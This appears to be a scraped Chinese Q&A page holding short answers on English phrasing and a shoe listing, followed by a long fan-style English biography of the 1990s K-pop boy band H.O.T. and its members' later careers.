因肠胃不适而卧床. 3 (in sport) unexpected result (运动)出乎意料的结局或成绩.
2023-01-04 01:08:221

"give sb a look"和"appeal sb to do"

这应该有点口语化了,要不就是"中国式英语",如 give me a look.这句是有的,后面那个没见过.
2023-01-04 01:08:231


大陆货,产地可能是福建省石狮市 没有找到确切的信息【品牌】:邦楚仕/BCS【系列】:邦楚仕商务男鞋日常休闲皮鞋系列【型号】:12060【材质】:头层牛皮、橡胶底【鞋款】:低帮/休闲鞋/皮鞋/商务鞋/时尚鞋/正装鞋【尺码】:38-44 皮鞋码【颜色】:灰色 浅棕 暗棕 黑色【产地】:中国属于销售擦边球
2023-01-04 01:08:271


H.O.T. was a popular five-member South Korean boy band of the late 1990s. The five-member boy band, who played various instruments, enjoyed massive success alongside the likes of Sechs Kies, Fin. K.L., S.E.S. and Shinhwa. Like many Korean bands, their name is an acronym - H.O.T. standing for "High-five Of Teenagers". They were formed by SM Entertainment in 1996 and disbanded in 2001.Moon Hee Jun (문희준) (born March 14, 1978) is the leader, rapper and singer of the band. His "candy" number and colour is "23" and yellow. Unofficially known as Moon by his English speaking fans, Moon is a decent singer and an outstanding dancer. Moon is best known for his boyishly handsome face, smooth rapping, and his penchant for Freddy Krueger-style razor-clawed gloves (for H.O.T"s 4th album). He is also famous for frequently changing his hair color and its style. In their fifth album jacket, he was photographed with a crimson-colored hair that seemed to inspire womanliness. He has a great sense of humor and is goofy, and he shows this on many talk shows.Jang Woo Hyuk (장우혁) (born May 8, 1978) is the group"s bass singer, and is the lead Korean rapper of the five, with an abrasive delivery inspired by American hip-hop artists. His "candy" number and colour is "35" and blue. Along with Hee Jun, he is also one of H.O.T"s best dancers. Earlier days, many girls were attracted to his charismatic appearance and quiet personality. His rap style is known to scream out the lyrics in most of their songs, evident in songs such as "We Are The Future", "Git It Up", "Warrior Descendants, and "I Yah". Yet he also does rapping that seems to whisper, similar to that of Jae Won, in songs such as "Hwan Hee (It"s Been Raining Since You Let Me)".Tony (토니) (born June 7, 1978) uses his English name rather than using his korean name An Seung Ho (안승호). He is the English and Korean rapper, singer, and vocal for the group. His "candy" number and colour is "7" and red. He performs most of the English rap lyrics, also composing them as well. Although he mostly raps, he has good vocals. Tony sings the chorus parts of certain songs. As other members have been in earlier days of H.O.T., he appealed to the young women with his cute baby-face countenance. He graduated from Cerritos High School in California, USA. He was discovered by Mr. Boone of Brothers Entertainment.Kangta (강타) (born October 10, 1979) is the lead vocal and backup rapper for the band. His "candy number" and colour is "27" and green. An Chil Hyun is also known by fans as Kangta, meaning a powerful blast in Korean (He chose the stagename to describe his powerful singing voice). The vast majority of H.O.T."s refrains are sung by Kangta. He has arguably the best singing voice. He is a decent rapper, but the weakest of the five, though his raps can be heard in one or two of H.O.T"s well known songs such as "Warrior Descendants", and a part in "Git it Up". In the earlier days of H.O.T., he was famous for his good-looking countenance that appealed to many young women. Being a former backup dancer, he is also a decent dancer, though compared to other members like Jang Woo Hyuk or Moon Hee Jun, he is only average.Lee Jae Won (이재원) (born April 4, 1980) is the youngest of the members. He is the Korean rapper and backup singer for the group. His "candy" number and color is "48" and orange. His rap style is smooth and subtle, sometimes delivered almost at a whisper. He is also a relatively good dancer, though he did not receive as much recognition in his dancing as Hee Jun or Woo Hyuk did. Although Elliot is both a singer and a rapper of the group, his forte is in rapping, and so does more rapping than singing. Elliot is also recognized for his noticeable physical appearances, such as his tall height compared to those of other members, spiky hair, and gentle countenance, which appealed to many young girls.H.O.T. was formed by producer Lee Soo Man of SM Entertainment. Their songs are a mixture of rap, Backstreet Boys-esque ballads, dance, and by 1999, rock, with Kangta providing most of the ballad vocals. Their costumes were from the clothing company Zippy Ziggy.The first member to join was Ahn Chil Hyun (a.k.a. Kangta), while hanging around Lotte World. The manager saw him dancing and singing, and was impressed. Second to join was Moon Hee Jun, after auditioning, he got in. Hee Jun then offered his friend, Lee Jae Won to audition, and Jae Won also made it. The fourth to join was Jang Woo Hyuk, after winning first place in a dancing contest. He was asked to try out and became the fourth member to join. Lastly, Tony An and his close friend Andy Lee were discovered by Brothers Entertainment and placed with SM Entertainment. Andy"s parents suddenly withdrew support, and Andy was dropped out of H.O.T. In 1998, he was put in a six-member group, Shinhwa.While they were remembered simply as a boy band aimed at teenage girls, the members made a fair amount of contribution to their albums by writing and composing their own songs. By the release of their third album "Resurrection", they had written most of their own lyrics. For their last two albums, "Iyah!" and "Outside Castle", they also began to compose the music for most of their songs. The members, Moon Hee Jun and Jang Woo Hyuk in particular, also choreographed all their dance moves to their songs, adding an exciting dimension to the band"s music videos. H.O.T also got the image if being angels after the release of their anime music video for their song "Promise of H.O.T.".They were the first k-pop group to ever hold a concert in the Seoul Olympic Stadium because of the magnitude of their fanbase. Because of their popularity, they were seen frequently in advertisements. At one point, they even had their own soda brand with a catch phrase "I only drink H.O.T.".Shortly before their disbandment, they starred in a "Space Jam"-like movie "Age of Peace", to which they also released a soundtrack consisting of trance & two vocal songs. "Age of Peace" was showcased in Japan while they were promoting their fourth album. Everything in the film except for the five members were computerized. They produced a soundtrack for this film as well. They won numerous awards from KMTV, and various popular music shows in Korea.As expected from teen idols, H.O.T. maintained a squeaky-clean image, avoiding things South Korea wouldn"t tolerate from singers such as avoiding military time (or skipping the country to do so), dropouts, battery, obscenity, arrest, drugs, and etc.In 1998, "We Are The Future""s promo video song earned an American MTV Video Award for Best International Video.They maintained a friendly rivalry with other K-pop bands such as Shinhwa and Sechs Kies, and were close friends with Kim Hwan Sung of N.R.G., who died tragically from pneumonia a week or two prior to his 20th birthday. Kangta, especially was heartbroken by his friend"s death. When N.R.G. released their album after Kim Hwan Sung"s death, Kangta wrote the main track of their album.H.O.T. released their last hit song, "A Song for Lady", which was used in the Korean drama "Autumn in my Heart". Clips from the drama can be seen in the song"s music video.H.O.T. disbanded in May of 2001. As H.O.T."s neared the end of their contracts with SM Entertainment, it was rumored that financial issues caused the group to split. Each member received royalties equivalent of 1 cent for each copy of their album sold, meaning that each of them would earn roughly $10,000 for selling million copies of their album. When An once complained that they were being underpaid, Lee Soo Man said "I even pay for your gas, what are you complaining about?" in response. [1]After the split, Kangta and Moon Hee Jun were offered lucrative contracts to SM Entertainment as solo artists and released moderately successful albums. While Kangta"s music was usually mainstream soul or R&B, Moon Hee Jun in the beginning, like Kangta, started with the mainstream R&B, but later attempted to establish a rock music career. However, Hee Jun was overshadowed by his teen idol image and was met with harsh criticism.The remaining members, Jang Woo Hyuk, Tony An, and Lee Jae Won, formed a three-member group called JTL under another label, and sold moderately successful albums.Later, Jang Woo Hyuk and a partner created their own dance company with Woo Hyuk leading his own team and school named "Newest".A few years after forming JTL, Tony An released a solo album, created his own entertainment company, Tn Entertainment, and a successful school uniforms company, Skoolooks.In 2005, Moon Hee Jun left SM Entertainment, creating his own company, PS Entertainment, and releasing one album. Later that year, Hee Jun headed off to military service, a duty required for every male Korean citizen.Lee Jae Won also left SM Entertainment, and on April 4, 2005, he released his first post-H.O.T. album, "No Pain, No Gain".On September 12, 2005, Jang Woo Hyuk released his first solo album No More Drama, performing with the renowned American hip-hop group Elite Force, who was also a former dance team for Will Smith. Woo Hyuk was the last member to release a solo album, and earned a reputation as "The Prince of Dance Music".
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